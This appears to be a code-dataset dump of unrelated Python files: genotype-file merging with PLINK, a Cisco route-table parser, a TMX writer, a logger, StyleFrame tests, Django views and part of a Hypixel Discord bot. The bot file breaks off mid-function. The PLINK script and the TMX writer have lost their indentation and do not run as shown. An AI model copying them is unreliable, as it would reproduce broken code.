# res = TrackingItem.create_and_commit(dummy_request, test_body)
# assert res['status'] == 'success'
# res_path = res['@graph'][0]
# app_res = testapp.get(res_path)
# assert app_res.json['tracking_type'] == test_body['tracking_type']
# assert app_res.json['other_tracking']['key1'] == test_body['other_tracking']['key1']
# # should not have date created in this case (no validators run)
# assert 'date_created' not in app_res.json
# # however status is added automatically when using create_and_commit fxn
# assert app_res.json['status'] == 'in review by lab'
| StarcoderdataPython |
194770 | <reponame>janaobsteter/Genotype_CODES<filename>CheckMergedFiles.py
import os
import GenFiles
import pandas as pd
from collections import defaultdict
import subprocess
import re
from itertools import chain
workdir = "/home/jana/Genotipi/Genotipi_DATA/Rjava_TEMP/"
os.chdir("/home/jana/Genotipi/Genotipi_DATA/Rjava_TEMP/")
os.system("ls -d Genotipi*/ > Dirs.txt")
dirs = list(pd.read_table("Dirs.txt", header=None).loc[:,0])
print(dirs)
chips = {19720: "GGPv02",
26145: "GGPv03",
26151: "GGPv03",
30105: "GGPv04",
30106: "GGPv04",
76883: "HD" ,
138892: "HDv02",
139376: "HDv02",
54001:"50Kv01" ,
54609: "50Kv02",
51274: "IDBv03",
52445: "IDBv03"
}
print(chips.values())
pedChip = defaultdict()
for dir in dirs:
# drop the ".ped" suffix (str.strip(".ped") would strip characters, not the suffix)
peds = [x[:-len(".ped")] for x in os.listdir(workdir + "/" + dir + "/") if x.endswith(".ped") and "Clean" not in x]
for ped in peds:
try:
if GenFiles.mapFile(workdir + "/" + dir + "/" + ped + ".map").chip in chips.values():
pedChip[workdir + "/" + dir + "/" + ped] = GenFiles.mapFile(workdir + "/" + dir + "/" + ped + ".map").chip
except:
pass
print(pedChip)
mergedir = "/home/jana/Genotipi/Genotipi_DATA/Genotipi_latest/Rjava/Top/"
compareDF = pd.DataFrame(columns=["File", "Concordance", "Format", "NumIndiv"])
comparedir = "/home/jana/Genotipi/Genotipi_DATA/Compare/"
os.chdir(comparedir)
for ped in pedChip.keys():
print(ped)
os.system("cut " + ped + '.ped -f1,2 -d" " > Inds.txt')
numindiv = os.popen("less Inds.txt | wc -l").read().strip()
os.system("cut " + ped + '.ped -f1500 -d" " | sort | uniq > Alleles.txt')
alleles = open("Alleles.txt").read().strip().split("\n")
print(alleles)
if 'G' in alleles:
format = "Top"
if 'B' in alleles:
format = "AB"
if alleles == ['A']:
print(ped + ": only A in alleles.")
pass
print("Format: " + format)
mergedir = "/home/jana/Genotipi/Genotipi_DATA/Genotipi_latest/Rjava/" + format + "/"
try:
os.system("plink --file " + ped + " --merge " +
mergedir + pedChip[ped] + "/" + "PLINK_MERGED.ped " +
mergedir + pedChip[ped] + "/" + "PLINK_MERGED.map --cow --recode --out DIFF0")
print("plink --file " + ped + " --merge " +
mergedir + pedChip[ped] + "/" + "PLINK_MERGED.ped " +
mergedir + pedChip[ped] + "/" + "PLINK_MERGED.map --cow --recode --out " + ped.split("/")[-1] + "DIFF0")
out = open(comparedir + "DIFF0.log").read().strip().split("\n")
print(out)
c = [x for x in chain.from_iterable([x.split(" ") for x in out if "Variant" in x]) if
bool(re.search(r'\d', x))]
print(c)
print(os.getcwd())
pd.DataFrame({"Variant": c}).to_csv(comparedir + "SpuriousSNPs.txt", header=None, index=None)
os.system("""sed -i "s/'//g" """ + comparedir + "SpuriousSNPs.txt")
os.system("grep -Fwf " + comparedir + "SpuriousSNPs.txt " + ped + ".map > " + comparedir + "RemoveSNPs.txt")
os.system("plink --file " + ped + " --merge " +
mergedir + pedChip[ped] + "/" + "PLINK_MERGED.ped " +
mergedir + pedChip[
ped] + "/" + "PLINK_MERGED.map --exclude RemoveSNPs.txt --merge-mode 7 --cow "
"--keep Inds.txt --recode --out DIFF > DIFFtmp.txt")
a = open("DIFFtmp.txt").read().strip().split("\n")
c = [x for x in a if "concordance rate" in x][0].split(" ")[-1].strip(".")
compareDF = compareDF.append(pd.DataFrame({"File": [ped.split("/")[-1]], "Concordance": [c], "Format": [format],
"NumIndiv": numindiv}))
except:
pass
compareDF.to_csv(comparedir + "CompareDF.csv") | StarcoderdataPython |
1724074 | import re
import csv
import ipaddress
__version__ = 1.0
# Each route will have the following values
class Route_Template(object):
def __init__(self):
self.route = {}
self.protocol = []
self.metric = []
self.next_hop = []
self.age = []
self.interface = []
def __repr__(self):
return str(self.route)
# The main code structure
class RouteParse(object):
def __init__(self):
self.route_table = {}
self.Read_File()
self.Generate_Output_To_File()
# Retrieve a route object if it exists
def Get_Route_Object(self,target_route):
for route in self.route_table:
if target_route in route:
return self.route_table[route]
return None
# If the regular expression picked up a valid route, extract the values into a temporary dictionary
def Get_Route_Values_From_Match(self,matchObj):
values = {}
for keyword, value in vars(Route_Template()).items():
if keyword in matchObj.groupdict():
val = str(matchObj.group(keyword).strip())
values[keyword] = val
else:
values[keyword] = "N/A"
return values
# Create a new route object using the values from the temporary dictionary
def Create_New_Route(self,match):
route = self.Get_Route_Values_From_Match(match)
route_prefix = route["route"]
if not self.Get_Route_Object(route_prefix):
NewRoute = Route_Template()
NewRoute.route = route["route"]
self.route_table[NewRoute.route] = NewRoute
# Check the detail for the route and append it to the object
def Add_Route_Detail(self,previous_route,line):
route = self.Get_Route_Object(previous_route)
route_patterns = [r'via (?P<next_hop>.*), (?P<interface>.*), (?P<metric>\[.*]), (?P<age>.*?), (?P<protocol>.*)', \
r'via (?P<next_hop>.*), (?P<metric>\[.*]), (?P<age>.*?), (?P<protocol>.*)']
for pattern in route_patterns:
match = re.search(pattern,line)
if match:
route.next_hop.append(match.group('next_hop').strip())
route.metric.append(match.group('metric').strip())
route.age.append(match.group('age').strip())
route.protocol.append(match.group('protocol').strip().replace(",","_"))
try:
route.interface.append(match.group('interface').strip())
except IndexError:
route.interface.append("N/A")
break
def Get_Host_Range(self,subnet):
try:
range = ipaddress.ip_network(subnet)
return range[1],range[-2]
except ValueError:
return "error", "error"
except IndexError: # Handles /32
return range[0], ""
def Generate_Output_To_File(self):
try:
with open('routes.csv', 'w', newline='') as csv_file:
spamwriter = csv.writer(csv_file, delimiter=',',
quotechar='|',
quoting=csv.QUOTE_MINIMAL)
spamwriter.writerow(['Route', 'Protocol','Metric','Next Hop','Age','Interface','From Range','To Range'])
for entry in sorted(self.route_table):
route = self.Get_Route_Object(entry)
first_ip, last_ip = self.Get_Host_Range(route)
for no in range(len(route.protocol)):
spamwriter.writerow([route.route,
route.protocol[no],
route.metric[no],
route.next_hop[no],
route.age[no],
route.interface[no],
first_ip,
last_ip])
print (" -- Output saved to 'routes.csv'")
except:
print (" -- Unable to write to routes.csv, if the file is already open close it.")
def Read_File(self):
start_processing_routes = False
invalid_phrases = ["subnetted"]
with open("routes.txt","r") as route_file:
for line in route_file:
#-----------------------
# Ignore certain input
#-----------------------
if line.count(' ') < 2:
continue
if any(x in line for x in invalid_phrases):
continue
if "<string>" in line:
start_processing_routes = True
continue
line = line.strip().replace("\n","")
if start_processing_routes:
regex = r'(?P<route>[0-9].*), ubest/mbest: (?P<value>.*)'
match = re.search(regex,line)
if match:
self.Create_New_Route(match)
last_route = match.group('route').strip()
continue
self.Add_Route_Detail(last_route, line)
print ("Cisco NXOS Route Parser version: '{}'".format(__version__))
c = RouteParse()
| StarcoderdataPython |
1750615 | """
Module for miscellaneous functions.
"""
import random
from collections import defaultdict
from string import letters
from lxml.builder import ElementMaker
from lxml import etree
def host_and_page(url):
""" Splits a `url` into the hostname and the rest of the url. """
url = url.split('//')[1]
parts = url.split('/')
host = parts[0]
page = "/".join(parts[1:])
return host, '/' + page
def read_from_url(url):
""" GET this `url` and read the response. """
import requests
response = requests.get(url)
return response.text
def write_tmx(stream, sentence_pairs, language_a, language_b):
""" Writes the SentencePair's out in tmx format, """
maker = ElementMaker()
token = "".join(random.sample(letters * 3, 50))
token_a = "".join(random.sample(letters * 3, 50))
token_b = "".join(random.sample(letters * 3, 50))
header = maker.header(srclang=language_a,
segtype="sentence",
creationtool="MTrans",
datatype="PlainText")
stream.write("<?xml version=\"1.0\" ?>\n")
stream.write("<!DOCTYPE tmx SYSTEM \"tmx14.dtd\">\n")
stream.write("<tmx version=\"1.4\">\n")
stream.write(etree.tostring(header, encoding="utf-8"))
stream.write("\n<body>\n")
for sentence_a, sentence_b in sentence_pairs:
src_tuv = maker.tuv({token: language_a}, maker.seg(token_a))
tgt_tuv = maker.tuv({token: language_b}, maker.seg(token_b))
tu = maker.tu(src_tuv, tgt_tuv)
tu_text = etree.tostring(tu, encoding="utf-8",
pretty_print=True)
tu_text = tu_text.replace(token, "xml:lang")
if sentence_a and sentence_b:
tu_text = tu_text.replace(token_a, sentence_a.to_text())
tu_text = tu_text.replace(token_b, sentence_b.to_text())
stream.write(tu_text)
stream.write("</body>\n</tmx>")
class CacheOfSizeOne(object):
""" Function wrapper that provides caching. """
f = None
def __init__(self, f):
self.f = f
self.args = None
self.kwargs = None
def __call__(self, *args, **kwargs):
if args != self.args or kwargs != self.kwargs:
self.result = self.f(*args, **kwargs)
self.args = args
self.kwargs = kwargs
return self.result
def __getattr__(self, name):
return getattr(self.f, name)
class Memoized(defaultdict):
def __missing__(self, key):
x = self.default_factory(key)
self[key] = x
return x
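# Usage sketch (not part of the original module) illustrating the two cache helpers above;
# the wrapped functions and values are made up for the example.
cached_double = CacheOfSizeOne(lambda x: x * 2)   # recomputed only when the argument changes
squares = Memoized(lambda key: key * key)         # __missing__ computes and stores on first access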
| StarcoderdataPython |
1633265 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from collections import defaultdict
from logging import StreamHandler, DEBUG, getLogger as realGetLogger, Formatter
try:
from colorama import Fore, Back, init, Style
class ColourStreamHandler(StreamHandler):
""" A colorized output SteamHandler """
ansi_colours = {
'CYAN': Fore.LIGHTCYAN_EX,
'RED': Fore.LIGHTRED_EX,
'YELLOW': Fore.LIGHTYELLOW_EX,
'MAGENTA': Fore.LIGHTMAGENTA_EX,
'GREEN': Fore.GREEN,
'WHITE': Fore.LIGHTWHITE_EX
}
# Some basic colour scheme defaults
colours = {
'DEBUG': Fore.LIGHTRED_EX,
'INFO': Fore.LIGHTGREEN_EX,
'WARN': Fore.LIGHTYELLOW_EX,
'WARNING': Fore.LIGHTYELLOW_EX,
'ERROR': Fore.LIGHTRED_EX,
'CRIT': Back.RED + Fore.WHITE,
'CRITICAL': Back.RED + Fore.WHITE,
'MESSAGE': Back.MAGENTA
}
colours_letter = defaultdict(lambda: 'YELLOW')
colours_letter['='] = 'RED'
colours_letter['{'] = 'WHITE'
colours_letter['}'] = 'WHITE'
colours_letter['\''] = 'CYAN'
colours_letter[':'] = 'RED'
colours_letter['-'] = 'RED'
colours_letter['>'] = 'RED'
colours_letter['<'] = 'RED'
colours_letter['.'] = 'RED'
colours_letter[','] = 'RED'
@property
def is_tty(self):
""" Check if we are using a "real" TTY. If we are not using a TTY it means that
the colour output should be disabled.
:return: Using a TTY status
:rtype: bool
"""
try: return getattr(self.stream, 'isatty', None)()
except: return False
def emit(self, record):
try:
message = self.format(record)
if not self.is_tty:
self.stream.write(message)
else:
level_name = "[{0}] ".format(record.levelname)
self.stream.write(self.colours[record.levelname] + level_name + Style.RESET_ALL)
for letter in record.getMessage():
self.stream.write(self.ansi_colours[self.colours_letter[letter]] + letter + Style.RESET_ALL)
self.stream.write(getattr(self, 'terminator', '\n'))
self.flush()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
has_colour = True
except:
has_colour = False
def getLogger(name=None, fmt='%(message)s'):
""" Get and initialize a colourised logging instance if the system supports
it as defined by the log.has_colour
:param name: Name of the logger
:type name: str
:param fmt: Message format to use
:type fmt: str
:return: Logger instance
:rtype: Logger
"""
log = realGetLogger(name)
# Only enable colour if support was loaded properly
handler = ColourStreamHandler() if has_colour else StreamHandler()
handler.setLevel(DEBUG)
handler.setFormatter(Formatter(fmt))
log.addHandler(handler)
log.setLevel(DEBUG)
log.propagate = 0 # Don't bubble up to the root logger
return log | StarcoderdataPython |
84009 | # -*- coding: utf-8 -*-
from __future__ import division, print_function
__all__ = ["simplexy"]
import numpy as np
from ._simplexy import simplexy as run_simplexy
_dtype = np.dtype([("x", np.float32), ("y", np.float32),
("flux", np.float32), ("bkg", np.float32)])
def simplexy(img, **kwargs):
r = run_simplexy(np.ascontiguousarray(img.T, dtype=np.float32),
**kwargs).T
return np.array(list(zip(*r)), dtype=_dtype)
| StarcoderdataPython |
1790591 | <gh_stars>100-1000
import unittest
import pandas as pd
from pandas.testing import assert_frame_equal
from styleframe import StyleFrame, Styler, Container, Series, utils
class SeriesTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.pandas_series = pd.Series((None, 1))
cls.sf_series = Series((Container(None), Container(1)))
def test_isnull(self):
self.assertTrue(all(p_val == sf_val
for p_val, sf_val in zip(self.pandas_series.isnull(), self.sf_series.isnull())))
def test_notnull(self):
self.assertTrue(all(p_val == sf_val
for p_val, sf_val in zip(self.pandas_series.notnull(), self.sf_series.notnull())))
def test_style_accessor(self):
sf = StyleFrame({'a': list(range(10))})
sf.apply_style_by_indexes(sf[sf['a'] % 2 == 0], styler_obj=Styler(bold=True, bg_color=utils.colors.yellow),
complement_style=Styler(bold=False, font=utils.fonts.calibri))
control_sf = StyleFrame({'a': list(range(0, 10, 2))})
test_sf = StyleFrame(sf.loc[sf['a'].style.font == utils.fonts.arial].reset_index(drop=True))
assert_frame_equal(control_sf.data_df, test_sf.data_df)
control_sf = StyleFrame({'a': list(range(0, 10, 2))})
test_sf = StyleFrame(sf.loc[sf['a'].style.bg_color == utils.colors.yellow].reset_index(drop=True))
assert_frame_equal(control_sf.data_df, test_sf.data_df)
control_sf = StyleFrame({'a': list(range(0, 10, 2))})
test_sf = StyleFrame(sf.loc[(sf['a'].style.bg_color == utils.colors.yellow)
&
sf['a'].style.font].reset_index(drop=True))
assert_frame_equal(control_sf.data_df, test_sf.data_df)
control_sf = StyleFrame({'a': list(range(1, 10, 2))})
test_sf = StyleFrame(sf.loc[sf['a'].style.font == utils.fonts.calibri].reset_index(drop=True))
assert_frame_equal(control_sf.data_df, test_sf.data_df)
control_sf = StyleFrame({'a': list(range(1, 10, 2))})
test_sf = StyleFrame(sf.loc[~sf['a'].style.bold].reset_index(drop=True))
assert_frame_equal(control_sf.data_df, test_sf.data_df)
control_sf = StyleFrame({'a': list(range(1, 10, 2))})
test_sf = StyleFrame(sf.loc[~sf['a'].style.bold
&
(sf['a'].style.font == utils.fonts.calibri)].reset_index(drop=True))
assert_frame_equal(control_sf.data_df, test_sf.data_df)
| StarcoderdataPython |
116156 | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# Copyright 2016 <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Creates token_lengths.npy from a full corpus stored as an SQLite database.
The file contains the token length counts as a numpy array.
"""
import sys
import numpy as np
from tqdm import tqdm
from corpus import Corpus
def main(len=len):
_, filename = sys.argv
corpus = Corpus.connect_to(filename)
total = len(corpus)
array = np.empty(total, dtype=np.uint32)
MAX = 2**32 - 1
for i, tokens in enumerate(tqdm(corpus, total=total)):
n_tokens = len(tokens)
assert n_tokens <= MAX
array[i] = n_tokens
del tokens
np.save('token_lengths', array)
if __name__ == '__main__':
main()
| StarcoderdataPython |
1670426 | arr=list(map(int,input().split()))
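# Dutch National Flag partition: sweep `mid` across the list, swapping 0s toward
# the front (low pointer) and 2s toward the back (high pointer); 1s stay in place.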
low=0
mid=0
high=len(arr)-1
while(mid<=high):
if (arr[mid]==0):
arr[low],arr[mid]=arr[mid],arr[low]
low+=1
mid+=1
elif (arr[mid]==1):
mid+=1
else:
arr[mid],arr[high]=arr[high],arr[mid]
high-=1
print(arr)
| StarcoderdataPython |
4825439 | <filename>server/blogsley/image/__init__.py<gh_stars>1-10
from datetime import datetime
from slugify import slugify
from blogsley.config import db
class Image(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(255))
filename = db.Column(db.String(100))
src = db.Column(db.String(255))
    timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
owner_id = db.Column(db.Integer, db.ForeignKey('user.id'))
| StarcoderdataPython |
3241699 | <reponame>TheShellLand/python
#!/usr/bin/env python
# -*- coding: utf8 -*-
import os
import requests
url = 'https://fpdl.vimeocdn.com/vimeo-prod-skyfire-std-us/01/4575/4/122877896/348642579.mp4?token' \
'=56957066_0x839f46c2194807f9e9fa0b07eaead9df817d2252'
local_dir = '/home/eric/Downloads'
def download_file(url):
os.chdir(local_dir)
local_filename = url.split('/')[-1]
# NOTE the stream=True parameter
r = requests.get(url, stream=True)
with open(local_filename, 'wb') as f:
chunk_downloaded = 0
for chunk in r.iter_content(chunk_size=1024):
print('Downloaded:', round(chunk_downloaded / 1024 / 1024, 2), 'MB')
if chunk: # filter out keep-alive new chunks
chunk_downloaded += 1024
f.write(chunk)
#f.flush() commented by recommendation from J.F.Sebastian
print('Total size:', chunk_downloaded / 1024, 'KB')
return local_filename
if __name__ == "__main__":
download_file(url)
| StarcoderdataPython |
1682632 | <gh_stars>0
from django.shortcuts import render, get_object_or_404, redirect
from django.views.generic import TemplateView
from django.contrib.auth.decorators import login_required
from django.utils.decorators import method_decorator
from .models import Publicaciones, Tematicas
from .forms import BibliotecaForms
# Create your views here.
class ListaBiblioteca(TemplateView):
template_name = "biblioteca.html"
def get_context_data(self, **kwargs):
context = super(ListaBiblioteca, self).get_context_data(**kwargs)
context['biblioteca_list'] = Publicaciones.objects.order_by('-fecha')
context['tematica'] = Tematicas.objects.all()
return context
@login_required
def bibliotecas_personales(request, template='admin/biblioteca_list_admin.html'):
object_list = Publicaciones.objects.filter(user_id=request.user.id)
return render(request, template, locals())
@login_required
def crear_biblioteca(request, template='admin/biblioteca_admin.html'):
if request.method == 'POST':
form = BibliotecaForms(request.POST, files=request.FILES)
if form.is_valid():
form_uncommited = form.save(commit=False)
form_uncommited.user = request.user
form_uncommited.save()
form.save_m2m()
#thread.start_new_thread(notify_all_notas, (form_uncommited,))
return redirect('biblioteca')
else:
form = BibliotecaForms()
return render(request, template, locals())
@login_required
def biblioteca_editar(request, id, template='admin/biblioteca_admin.html'):
object = get_object_or_404(Publicaciones, id=id)
if request.method == 'POST':
form = BibliotecaForms(request.POST, request.FILES, instance=object)
if form.is_valid() :
form_uncommited = form.save(commit=False)
form_uncommited.user = request.user
form_uncommited.save()
form.save_m2m()
return redirect('biblioteca')
else:
form = BibliotecaForms(instance=object)
return render(request, template, locals())
@login_required
def eliminar_biblioteca(request, id):
nota = Publicaciones.objects.filter(id = id).delete()
return redirect('biblioteca')
| StarcoderdataPython |
3370462 | <filename>compiler-rt/test/sanitizer_common/ios_commands/iossim_prepare.py
#!/usr/bin/python
import json
print(json.dumps({"env": {}}))
| StarcoderdataPython |
1722453 | <filename>commands/serverstats.py
import discord
from discord.ext import commands
from mojang import MojangAPI
from utils.utils import hypixel, utils
from utils.embeds import Embeds
import random
import datetime
import time as thyme
import mystbin
import re
mystbin_client = mystbin.MystbinClient()
class ServerStats(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(aliases=['lb'])
async def leaderboard(self, ctx, game: str=None, *, typevar: str=None):
if ctx.guild is not None:
me = ctx.guild.get_member(self.bot.user.id)
perms = ctx.channel.permissions_for(me)
if perms.send_messages:
if not perms.embed_links:
await ctx.send("Error: Cannot send embeds in this channel. Please contact a server administrator to fix this issue.")
return
if perms.embed_links:
pass
if not perms.send_messages:
return
if game is None:
embed = discord.Embed(title="Error", description="""Please provide a game.""", color=0xff0000)
await ctx.send(embed=embed)
return
if typevar is None:
embed = discord.Embed(title="Error", description="""Please provide a leaderboard.""", color=0xff0000)
await ctx.send(embed=embed)
return
if not typevar.lower().startswith('overall') and not typevar.lower().startswith('monthly') and not typevar.lower().startswith('weekly') and not typevar.lower().startswith('daily'):
t = "Overall " + typevar
typevar = t
if typevar.lower() == 'overall level':
typevar = "Current Level"
#send request
data = await hypixel.leaderboards()
#errors
if data['success'] == False:
embed = discord.Embed(title="Error", description="""Something went wrong.""", color=0xff0000)
await ctx.send(embed=embed)
return
#it worked!
elif data['success'] == True:
game = game.upper()
typevar = typevar.lower()
leaders = None
title = None
for lb in data['leaderboards']:
if lb == game.upper():
for reekid in data['leaderboards'][lb]:
titl = reekid['prefix'] + " " + reekid['title']
if titl.lower() == typevar:
title = reekid['prefix'] + " " + reekid['title']
leaders = reekid['leaders']
break
if leaders is None:
embed = discord.Embed(title='Error', description='Invalid leaderboard.', color=0xff0000)
await ctx.send(embed=embed)
return
msg = ''
num = 0
async with ctx.channel.typing():
for uid in leaders:
uid = uid.replace('-','')
name = await hypixel.getname(uid)
if name is None:
name = 'N/A'
num += 1
msg += f"{num}: {name}\n"
color=random.randint(1, 16777215)
embed = discord.Embed(title=f'{game.lower().capitalize()}: {title} leaderboard', description=msg, color=color)
embed.set_footer(text='Unofficial Hypixel Discord Bot')
await ctx.send(embed=embed)
@commands.command(aliases=['players','count', 'pc'])
async def playercount(self, ctx):
perms = None
if ctx.guild is not None:
me = ctx.guild.get_member(self.bot.user.id)
perms = ctx.channel.permissions_for(me)
if perms.send_messages:
if not perms.embed_links:
await ctx.send("Error: Cannot send embeds in this channel. Please contact a server administrator to fix this issue.")
return
if perms.embed_links:
if not perms.add_reactions:
embed=discord.Embed(title="Error", description="Cannot add reactions in this channel. Please contact a server administrator to fix this issue.", color=0xff0000)
await ctx.send(embed=embed)
return
if perms.add_reactions:
pass
if not perms.send_messages:
return
data = await hypixel.counts()
if data['success'] == True:
embeds, paginator = await Embeds().PlayerCount().generate(ctx, data, perms)
await paginator.run(embeds)
else:
embed = discord.Embed(title="Error", description="""Couldn't retrieve Hypixel player counts. Please try again later.""", color=0xff0000)
await ctx.send(embed=embed)
return
@commands.command(aliases=['g'])
async def guild(self, ctx, *, guildname:str=None):
if ctx.guild is not None:
me = ctx.guild.get_member(self.bot.user.id)
perms = ctx.channel.permissions_for(me)
if perms.send_messages:
if not perms.embed_links:
await ctx.send("Error: Cannot send embeds in this channel. Please contact a server administrator to fix this issue.")
return
if perms.embed_links:
pass
if not perms.send_messages:
return
if guildname is None:
embed = discord.Embed(title="Error", description='Please provide a guild to search for.', color=0xff0000)
await ctx.send(embed=embed)
return
gnamesearch = guildname.replace(' ','%20')
try:
data = await hypixel.guild(gnamesearch)
except ValueError:
embed = discord.Embed(title="Error", description="""The guild """ + guildname + ' does not exist.', color=0xff0000)
await ctx.send(embed=embed)
return
try:
glevel = utils.guildlevel(xp=data['guild']['exp'])
except:
glevel = 'N/A'
try:
gname = data['guild']['name']
except:
gname = 'N/A'
try:
            time = datetime.datetime.fromtimestamp(data['guild']['created']/1000.0)
date = time.strftime("%m/%d/%Y")
minute = time.strftime("%M")
if int(time.strftime('%H')) == 12:
ampm = 'PM'
hour = time.strftime('%H')
elif int(time.strftime('%H')) > 12:
hour = int(time.strftime('%H')) - 12
ampm = 'PM'
elif int(time.strftime('%H')) < 12:
ampm = 'AM'
hour = time.strftime('%H')
else: #this should never happen
hour = None
ampm = None
created = str(date) + ' at ' + str(hour) + ':' + str(minute) + ' ' + ampm + ', EST'
except:
created = 'N/A'
try:
desc = data['guild']['description']
except:
desc = 'N/A'
try:
tag = data['guild']['tag']
except:
tag = 'N/A'
try:
mbrs = len(data['guild']['members'])
except:
mbrs = 'N/A'
try:
gmuuid = data['guild']['members'][0]['uuid']
gm = await hypixel.getname(gmuuid)
if gm is None:
gm = 'N/A'
except:
gm = 'N/A'
color=random.randint(1, 16777215)
embed = discord.Embed(title='Guild Info', color=color)
embed.add_field(name="Guild Name", value=str(gname), inline=True)
embed.add_field(name="Guild Manager", value=str(gm), inline=True)
embed.add_field(name="Members", value=str(utils.comma(mbrs)), inline=True)
embed.add_field(name="Created On", value=str(created), inline=True)
embed.add_field(name="Guild Level", value=str(utils.comma(glevel)), inline=True)
embed.add_field(name="Guild Description", value=str(desc), inline=True)
embed.add_field(name="Guild Tag", value=str(tag), inline=True)
embed.set_footer(text='Unofficial Hypixel Discord Bot')
await ctx.send(embed=embed)
@commands.command(aliases=['wd'])
async def watchdog(self, ctx):
perms = None
if ctx.guild is not None:
me = ctx.guild.get_member(self.bot.user.id)
perms = ctx.channel.permissions_for(me)
if perms.send_messages:
if not perms.embed_links:
await ctx.send("Error: Cannot send embeds in this channel. Please contact a server administrator to fix this issue.")
return
if perms.embed_links:
pass
if not perms.send_messages:
return
data = await hypixel.watchdog()
if data['success'] == True:
try:
wdtotal = data['watchdog_total']
except:
wdtotal = 'N/A'
try:
stafftotal = data['staff_total']
except:
stafftotal = 'N/A'
color=random.randint(1, 16777215)
embed = discord.Embed(title="Hypixel Watchdog Statistics", color = color)
embed.add_field(name="Watchdog Bans", value=str(utils.comma(wdtotal)))
embed.add_field(name="Staff Bans", value=str(utils.comma(stafftotal)))
try:
embed.add_field(name="Total Bans", value=str(utils.comma(wdtotal+stafftotal)))
except:
embed.add_field(name="Total Bans", value='N/A')
embed.set_footer(text='Unofficial Hypixel Discord Bot')
await ctx.send(embed=embed)
@commands.command(aliases=['boosts'])
@commands.cooldown(1, 3600, commands.BucketType.user)
async def boosters(self, ctx, *, game:str=None):
if ctx.guild is not None:
me = ctx.guild.get_member(self.bot.user.id)
perms = ctx.channel.permissions_for(me)
if perms.send_messages:
if not perms.embed_links:
await ctx.send("Error: Cannot send embeds in this channel. Please contact a server administrator to fix this issue.")
return
if perms.embed_links:
pass
if not perms.send_messages:
return
color=random.randint(1, 16777215)
if game is None:
try:
number = await hypixel.boosters()
except ValueError:
embed = discord.Embed(title="Hypixel Boosters", description=f"There are currently 0 boosters active on the network.", color=color)
await ctx.send(embed=embed)
return
embed = discord.Embed(title="Hypixel Boosters", description=f"There are {utils.comma(number)} boosters on the Hypixel Network.\nFor boosters for a specific gamemode, please run `h!boosters <game>`.", color=color)
await ctx.send(embed=embed)
return
try:
data = await hypixel.boosters('id')
except ValueError:
embed = discord.Embed(title="Hypixel Boosters", description=f"There are currently 0 boosters active on the network.", color=color)
await ctx.send(embed=embed)
return
_game = game.replace(' ','_')
try:
id = utils.gameidconverter(_game)
except ValueError:
embed = discord.Embed(title="Error", description=f"Invalid game.", color=0xff0000)
await ctx.send(embed=embed)
return
msg1 = ''
amnt = 0
embed = discord.Embed(title="Hypixel Boosters", description=f"Collecting data, please wait.\nThis message will be edited once data is ready.", color=color)
embed.set_footer(text='Unofficial Hypixel Discord Bot')
message = await ctx.send(embed=embed)
for booster in data:
if booster['gameType'] == id:
user = await hypixel.getname(booster['purchaserUuid'])
msg1 += f"{user} - ID: {booster['_id']}\n"
amnt += 1
if msg1 == '':
msg1 = f"There are currently 0 {game.lower().capitalize()} boosters active."
paste = await mystbin_client.post(msg1.replace('\\', ''), syntax="text")
url = str(paste)
embed = discord.Embed(title="Hypixel Boosters", description=f"There are {amnt} {game.lower().capitalize()} boosters on the network.\nBoosters have been uploaded to {url}.", color=color)
embed.set_footer(text='Unofficial Hypixel Discord Bot')
await message.edit(embed=embed)
embed = discord.Embed(title=f"Your data is ready!", description=f"I have collected all of the {game.lower().capitalize()} boosters.\n[Jump to message]({message.jump_url})", color=color)
embed.set_footer(text='Unofficial Hypixel Discord Bot')
await ctx.send(f"{ctx.author.mention}", embed=embed)
self.boosters.reset_cooldown(ctx)
@commands.command(aliases=['boost'])
async def booster(self, ctx, booster: str=None):
if ctx.guild is not None:
me = ctx.guild.get_member(self.bot.user.id)
perms = ctx.channel.permissions_for(me)
if perms.send_messages:
if not perms.embed_links:
await ctx.send("Error: Cannot send embeds in this channel. Please contact a server administrator to fix this issue.")
return
if perms.embed_links:
pass
if not perms.send_messages:
return
color=random.randint(1, 16777215)
current = int(thyme.time())
if booster is None:
embed = discord.Embed(title="Error", description="""Please provide a booster ID.""", color=0xff0000)
await ctx.send(embed=embed)
return
try:
data = await hypixel.boosters('all')
except discord.NotFound:
embed = discord.Embed(title="Hypixel Boosters", description=f"There are currently 0 boosters active on the network.", color=color)
await ctx.send(embed=embed)
return
info = ''
for i in data:
if i['_id'] == booster:
info = i
break
if info == '':
embed = discord.Embed(title="Hypixel Boosters", description=f"Invalid booster.", color=0xff0000)
await ctx.send(embed=embed)
return
exp = 'N/A'
passed = current-(info['dateActivated']/1000)
remaining = info['length']-passed
seconds = int(float(remaining))
min, sec = divmod(seconds, 60)
hour, min = divmod(min, 60)
if hour == 0:
if min == 0:
exp = f'{sec} seconds'
elif min > 0:
if len(str(min)) == 1:
if len(str(sec)) == 1:
exp = f"0:0{min}:0{sec}"
else:
exp = f"0:0{min}:{sec}"
else:
if len(str(sec)) == 1:
exp = f"0:{min}:0{sec}"
else:
exp = f"0:{min}:{sec}"
elif hour > 0:
if len(str(hour)) == 1:
if len(str(min)) == 1:
exp = f"0{hour}:0{min}"
else:
exp = f"0{hour}:{min}"
else:
exp = f"{hour}:{min}"
try:
user = await hypixel.getname(info['purchaserUuid'])
if user is None:
embed = discord.Embed(title="Error", description="""Something went wrong. Please try again later.""", color=0xff0000)
await ctx.send(embed=embed)
return
except:
user = 'N/A'
try:
uuid = info['purchaserUuid']
except:
uuid = 'N/A'
try:
multiplier = info['amount']
except:
multiplier = 'N/A'
try:
length = 'N/A'
seconds = int(float(info['originalLength']))
min, sec = divmod(seconds, 60)
hour, min = divmod(min, 60)
if hour == 0:
if min == 0:
length = f'0:{sec}'
elif min > 0:
if len(str(min)) == 1:
if len(str(sec)) == 1:
length = f"0:0{min}:0{sec}"
else:
